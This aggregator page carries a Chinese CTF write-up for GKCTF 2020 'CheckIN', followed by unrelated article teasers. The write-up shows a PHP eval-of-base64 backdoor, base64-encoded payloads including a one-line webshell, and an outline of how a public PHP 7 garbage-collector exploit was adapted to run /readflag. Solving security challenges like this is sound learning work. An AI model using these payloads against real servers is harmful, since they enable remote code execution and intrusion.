news 2026/6/18 11:38:45

[GKCTF 2020]CheckIN

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[GKCTF 2020]CheckIN

classClassName{public$code=null;public$decode=null;function__construct(){// 1. 从 $_REQUEST(GET/POST/Cookie)中获取「Ginkgo」参数的值$this->code=@$this->x()['Ginkgo'];// 2. 对 Ginkgo 的值做 base64 解码$this->decode=@base64_decode($this->code);// 3. 执行解码后的代码@Eval($this->decode);}publicfunctionx(){return$_REQUEST;}}newClassName();// 实例化类,自动触发 __construct 方法

就是执行用base64加密的$_REQUEST传入的参数Ginkgo
phpinfo();加密后为cGhwaW5mbygpOw==

/?Ginkgo=cGhwaW5mbygpOw==


没禁用eval等函数

传一句话木马连接上shell。
eval($_POST[pwd]);加密后为ZXZhbCgkX1BPU1RbcHdkXSk7

打开却显示flag为空。
发现readflag文件,应该是运行这个文件来读flag。

php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3

php7-gc-bypass漏洞源于 PHP 垃圾回收(GC)机制中的堆溢出,PHP 的 GC 在处理循环引用的变量时,会对内存块进行标记和回收。漏洞存在于内存块的大小计算逻辑中,恶意构造的循环引用变量会触发堆溢出,覆盖相邻内存数据。因此利用堆溢出可篡改函数指针,最终执行任意系统命令。

网上有EXP ( Exploit ),修改一下执行对象为readflag。
修改后上传文件至tmp目录下。

include('/tmp/exploit.php');加密后为aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/18 1:52:00

给AI“考题”换个计分方式,谷歌SigLIP让多模态模型学得又快又好!

CLIP很强,但它也有“贵族病”:训练成本高得让人望而却步,动辄上千GPU天的算力让无数团队只能仰望。 直到SigLIP横空出世。 它用一个简单到近乎“暴力”的思想——Sigmoid Loss,把CLIP那套繁琐的InfoNCE损失彻底抛弃,…

作者头像 李华
网站建设 2026/6/15 13:50:19

2026年java找工作难吗?java就业环境怎么样?

2026年找工作会“难”,但不是对所有人。 它会呈现出非常明显的 “两极分化” 态势,对初级/基础不牢的求职者: 会非常困难,内卷严重,要求水涨船高。对中高级/有核心竞争力(架构、高并发、云原生等&#xff0…

作者头像 李华
网站建设 2026/6/18 4:29:01

告别生鲜损耗困局:从经验猜货到数据驱动的盈利升级

社区生鲜的盈利枷锁:凭经验进货的损耗困局生鲜损耗是社区生鲜门店盈利的核心障碍,绝大多数管理者都困在“凭经验猜进货” 的被动处境中。就拿社区生鲜店主王哥来说,他虽靠着 “当日鲜采” 的口碑攒下大批忠实熟客,却始终逃不过高损…

作者头像 李华
网站建设 2026/6/17 12:37:04

定制报告-个性化定制-按需专项研究报告-智信中科研究网

定制报告-个性化定制-按需专项研究报告-智信中科研究网市场专项研究报告智信中科研究网个性化定制报告全力解决您的各类需求,为了满足客户在不同发展阶段的不同需求,智信中科研究网可以依据客户的个性化需求,针对性帮助客户完成符合需求的市场…

作者头像 李华